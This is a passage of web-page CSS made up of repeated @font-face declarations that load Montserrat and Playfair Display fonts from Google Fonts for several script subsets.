url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wdhyzbi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wdhyzbi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wdhyzbi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wdhyzbi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wdhyzbi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, 